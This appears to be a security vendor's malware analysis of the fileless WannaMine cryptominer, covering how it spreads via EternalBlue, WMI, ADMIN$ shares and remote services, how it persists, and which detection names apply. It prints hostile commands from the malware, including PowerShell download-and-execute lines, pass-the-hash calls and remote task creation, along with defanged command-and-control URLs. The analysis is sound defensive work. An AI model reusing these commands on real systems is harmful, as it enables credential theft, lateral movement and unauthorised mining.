A distribution method of CoinMiner has become more diversified. In early 2019, AhnLab ASEC Analysis Team introduced CoinMiner that exploits SMB vulnerability(MS17-010 EternalBlue) for distribution.
Recently, it was confirmed that a fileless CoinMiner malware named “WannaMine” exploits not only SMB vulnerabilities for distribution, but also Windows Management Instrumentation (WMI), ADMIN$ shared folders, remote service registration and operation through SMB.
Figure 1 describes the overall process of WannaMine.
Figure 1. Process of WannaMine (To be translated)
When the “sysupdater0.bat” file is executed on the first infected PC, there are different methods per OS version. If it is Windows XP, it downloads VB script file(*.vbs) from outside and runs via “cscript.exe” since PowerShell is not available. In case of Windows Vista or other advanced OS, it downloads PowerShell script(*.ps1) and executes via “powershell.exe”. Despite their difference in script type(*.vbs, *.ps1), they share the internal features and damage the system by executing encoded CoinMiner, Mimikatz hacking tools, and EternalBlue shellcode(MS17-010) that are inside the downloaded script.
Distributions are attempted via port 135 and port 445. In case of port 135, the WMI command is used to operate the “cmd.exe” of the remote system to download and run external files. As for port 445, there are a total of three methods: ▲To distribute via SMB vulnerabilities(MS17-010) ▲To distribute via ADMIN$ shared folders ▲To register remote services through SMB.
Figure 2. Details of sysupdater0.bat
If the first infected PC is Windows Vista or others with higher version, the externally downloaded PowerShell script operates in a fileless form using the ‘DownloadString’ function.
| Windows Ver. | Architecture | PowerShell Script Download URL |
| Vista or later | x64 | hxxps://profetestruec.net/in6.ps1 hxxps://128.14.23.149/in6.ps1 hxxps://5.135.125.71/in6.ps1 hxxps://172.247.116.87/in6.ps1 hxxps://172.247.116.8/in6.ps1 |
| x86 | hxxps://profetestruec.net/in3.ps1 hxxps://128.14.23.149/in3.ps1 hxxps://5.135.125.71/in3.ps1 hxxps://172.247.116.87/in3.ps1 hxxps://172.247.116.8/in3.ps1 | |
| XP or later | x64/x86 | hxxps://profetestruec.net/info.vbs hxxps://128.14.23.149/info.vbs hxxps://5.135.125.71/info.vbs hxxps://172.247.116.87/info.vbs hxxps://172.247.116.8/info.vbs |
1. Features of the downloaded PowerShell script (in3.ps1, in6.ps1)
The in3.ps1 script (for x86) contains Mimikatz for stealing Windows account information, EternalBlue shellcode for distributing SMB vulnerability(MS17-010), CoinMiner and others encrypted as BASE64. Then, these are registered in the WMI class of the infected PC(systemcore_Updater4) and run by a PowerShell command.
| WMI Class (root\default: systemcore_Updater4) Property | |
| funs | Key PowerShell script that performs features such as EternalBlue, remote service creation and execution, remote scheduler registration and execution, etc. |
| mimi | Mimikatz to steal user credentials |
| mon | CoinMiner binary (1) (injected by in3.ps1 to powershell.exe) |
| mons | CoinMiner binary (2) (binary which injects CoinMiner to schtasks.exe) |
| sc | Shellcode that is used to distribute EternalBlue |
After registering payloads to the WMI class property, malicious PowerShell scripts utilize the WMI’s Event Filter and Consumer for persistence of system before distribution to the network and CoinMiner process execution take place.
2. Registering WMI Event Filter
Malware registers itself to Registry Run or RunOnce key and it is a widely known technique to reside in infected PC. However, in case of WannaMine, a malicious PowerShell script continues its operation even when the PC is rebooted. This is enabled by connecting registered Event Filter and Consumer via “FilterToConsumerBinding” after setting them up.
Figure 3. WMI Event Filter registered by WannaMine
If the WQL query is registered as Event Filter, the PowerShell command below is executed 4-5 minutes after the system reboot.
| powershell.exe -NoP -NonI -W Hidden –E “Encoded Script” |
The feature of encoded script is delivered by a partial encoding of in3.ps1(for x86). It carries out behaviors such as CoinMiner distribution, CoinMiner execution on the infected PC and termination of PowerShell process communicating with the certain port.
3. Termination of PowerShell process communicating with the certain port
If any of the ports currently open in the system is communicating with port 3333, port 5555 or port 7777, a process gets terminated.
| $tcpconn = netstat -anop tcp … foreach ($t in $tcpconn) { $line =$t.split(‘ ‘)| ?{$_} if ($line -eq $null){continue} if (($line[-3].contains(“:3333”) -or $line[-3].contains(“:5555”)-or $line[-3].contains(“:7777”)) -and $t.contains(“ESTABLISHED”)) { $evid=$line[-1] Get-Process -id $evid | stop-process -force } } |
4. Change power saving mode settings of Infected PC
In addition, it changes the system’s power settings to keep it on during coin mining.
| powercfg /CHANGE -standby-timeout-ac 0 | Set system not to turn into standby mode when it is powered by AC. |
| powercfg /CHANGE -hibernate-timeout-ac 0 | Set system not to turn into hibernation when it is powered by AC. |
| Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 | For laptops, set system not to turn into standby mode when laptop cover is closed. |
5. Distribution method
WannaMine checks network adapter settings of the infected PC and conducts distribution to random IPs based on the current IP address and the subnet mask. Different distribution methods are used considering the connection of RPC DCOM(port 135) and SMB(port 445) to the remote PC.
1) RPC DCOM (Port 135)
(1) Use WMI to run remote process
The attacker uses the Mimikatz hacking tool before network distribution to acquire the NTLM hash value. It enables to perform remote commands without client’s local administrator privilege.
The string in the $cmd variable differs per OS version of remote PC: $cmds for Vista or higher version, and $cmdvbs for XP or lower version.
| If NTLM hash exists | Invoke-WmiMethod -class win32_process -name create -Argumentlist $cmd -Credential $cred -Computername $IP |
| Invoke-WMIpth -Target $ip -Username $user -Hash $ntlmhash | |
| Invoke-WMIpth -Target $ip -domain $domain -Username $user -Hash $ntlmhash | |
| Invoke-WMIpth -Target $ip -Username “administrator” -Hash $ntlmhash | |
| Invoke-WMIpth -Target $ip -Username ‘administrator’ -Hash $ntlmhash -command $cmdntlm | |
| If NTLM hash does not exist (Require local administrator privilege to run command) | Invoke-WmiMethod -class win32_process -name create -Argumentlist $cmd -Credential $cred -Computername $IP |
| $cmdvbs =”cmd /v:on /c for /f `”tokens=2 delims=.[`” %i in (‘ver’) do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%\11.vbs&@echo Set ox=CreateObject^(`”MSXML2.XMLHTTP`”^)>>%windir%\11.vbs&@echo ox.open `”GET`”,`”$nic/info.vbs`”,false>>%windir%\11.vbs&@echo ox.send^(^)>>%windir%\11.vbs&@echo If ox.Status=200 Then>>%windir%\11.vbs&@echo Set oas=CreateObject^(`”ADODB.Stream`”^)>>%windir%\11.vbs&@echo oas.Open>>%windir%\11.vbs&@echo oas.Type=1 >>%windir%\11.vbs&@echo oas.Write ox.ResponseBody>>%windir%\11.vbs&@echo oas.SaveToFile `”%windir%\info.vbs`”,2 >>%windir%\11.vbs&@echo oas.Close>>%windir%\11.vbs&@echo End if>>%windir%\11.vbs&@echo Set os=CreateObject^(`”WScript.Shell`”^)>>%windir%\11.vbs&@echo os.Exec^(`”cscript.exe %windir%\info.vbs`”^)>>%windir%\11.vbs&cscript.exe %windir%\11.vbs) else (powershell `”[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};`$aa=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if((`$aa -eq `$null) -or !`$aa.contains(‘$filter_name’)) {if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘$nic/in6.ps1’)}else{IEX(New-Object Net.WebClient).DownloadString(‘$nic/in3.ps1’)}}`”)” |
| $cmdps =”cmd /c powershell.exe -NoP -NonI -W Hidden `”[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘$nic/in6.ps1’)}else{IEX(New-Object Net.WebClient).DownloadString(‘$nic/in3.ps1’)}`”” |
Figure 4. Packet upon running Invoke-WmiMethod command(RemoteCreateInstance)
Figure 5. Executing $cmdps command from remote PC
2) SMB (port 445)
(1) Creating service through SMB protocol
NTLM hash is required just like RPC DCOM(port 135) to run service on a remote PC. If there is no NTLM hash, local administrator privilege of the remote PC is required.
| If NTLM hash exists | Invoke-SMBpth -Target $ip -domain $domain -Username $User -Hash $passwd -command $cmd |
| If NTLM hash does not exist (Need local administrator privilege to run command) | Invoke-SMBExec -Target $ip -domain $domain -Username $User -Password $passwd -command $cmd |
Figure 6. Packet related to service creation using SMB (Creating service “OAAUXMKLQWJDQPJFTIGT”)
Figure 7. Remote PC creating service “OAAUXMKLQWJDQPJFTIGT”
(2) Creating task scheduler through shared folders
| $echotxt | out-file \\$ip\Admin$\Temp\sysupdater0.bat -encoding ascii |
| schtasks /create /s $ip /sc weekly /ru “NT authority\system” /TN “sysupdater0” /TR “c:\windows\temp\sysupdater0.bat” /U $username /P $passwd /f |
| $echotxt =”setlocal EnableDelayedExpansion & for /f `”tokens=2 delims=.[`” %%i in (‘ver’) do (set a=%%i)&if !a:~-1!==5 (@echo on error resume next>%windir%\11.vbs&@echo Set ox=CreateObject^(`”MSXML2.XMLHTTP`”^)>>%windir%\11.vbs&@echo ox.open `”GET`”,`”$nic/info.vbs`”,false>>%windir%\11.vbs&@echo ox.send^(^)>>%windir%\11.vbs&@echo If ox.Status=200 Then>>%windir%\11.vbs&@echo Set oas=CreateObject^(`”ADODB.Stream`”^)>>%windir%\11.vbs&@echo oas.Open>>%windir%\11.vbs&@echo oas.Type=1 >>%windir%\11.vbs&@echo oas.Write ox.ResponseBody>>%windir%\11.vbs&@echo oas.SaveToFile `”%windir%\info.vbs`”,2 >>%windir%\11.vbs&@echo oas.Close>>%windir%\11.vbs&@echo End if>>%windir%\11.vbs&@echo Set os=CreateObject^(`”WScript.Shell`”^)>>%windir%\11.vbs&@echo os.Exec^(`”cscript.exe %windir%\info.vbs`”^)>>%windir%\11.vbs&cscript.exe %windir%\11.vbs) else (setlocal DisableDelayedExpansion&powershell `”[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}; `$aa=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if((`$aa -eq `$null) -or !`$aa.contains(‘$filter_name’)) {if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘$nic/in6.ps1’)}else{IEX(New-Object Net.WebClient).DownloadString(‘$nic/in3.ps1’)}}`”)” |
(3) SMB vulnerabilities (MS17-010) distribution
Figure 8 and Figure 9 below show the captured packets attempting to access EternalBlue vulnerability on a remote PC. If EternalBlue vulnerability is successfully exploited, a malicious fileless PowerShell script is downloaded and executed based on the OS of remote PC
| Architecture | PowerShell Script Download URL |
| x64 | hxxp://profetestruec.net:8000/ze6.ps1 |
| x86 | hxxp://profetestruec.net:8000/ze3.ps1 |
Figure 8. Sending EternalBlue packet
Figure 9. ShellCode within the EternalBlue packet
In addition to EternalBlue vulnerability, distribution methods such as WMI, ADMIN$ shared folders, remote service registration are proper features provided by the system. Since the attackers utilized these to distribute CoinMiner, it is difficult to determine whether it’s malicious or not solely with network packet. Users should therefore consider changing the default port to prevent attackers from exploiting the SMB and WMI protocols, or deactivate these services if they are deemed unnecessary.
AhnLab detects and prevents the behaviors under the following aliases when abnormal behaviors occur in the PC affected by SMB or WMI protocol.
The Miner which carries out the final malicious behavior, operates after being injected to powershell.exe or schtask.exe; it is the 2.14.1 Miner with XMRig version.
[File Detection]
BAT/Downloader (2019.08.25.00)
VBS/Downloader (2019.08.25.00)
Script/Powershell (2019.08.25.00)
Trojan/Win32.CoinMiner (2019.04.11.07, 2019.08.25.00)
[Behavior Detection]
(1) In case of distributing via RPC DCOM (Port 135)
– Malware/MDP.Behavior.M2330 // wmiprvse.exe blocks the execution of PowerShell script
(2) Creating service via SMB protocol (port 445)
– Malware/MDP.Behavior.M2324 // Blocks service registration by the download feature of external script file
[V3 IPS Block]
– Detects EternalBlue vulnerability packets
Categories:Malware Information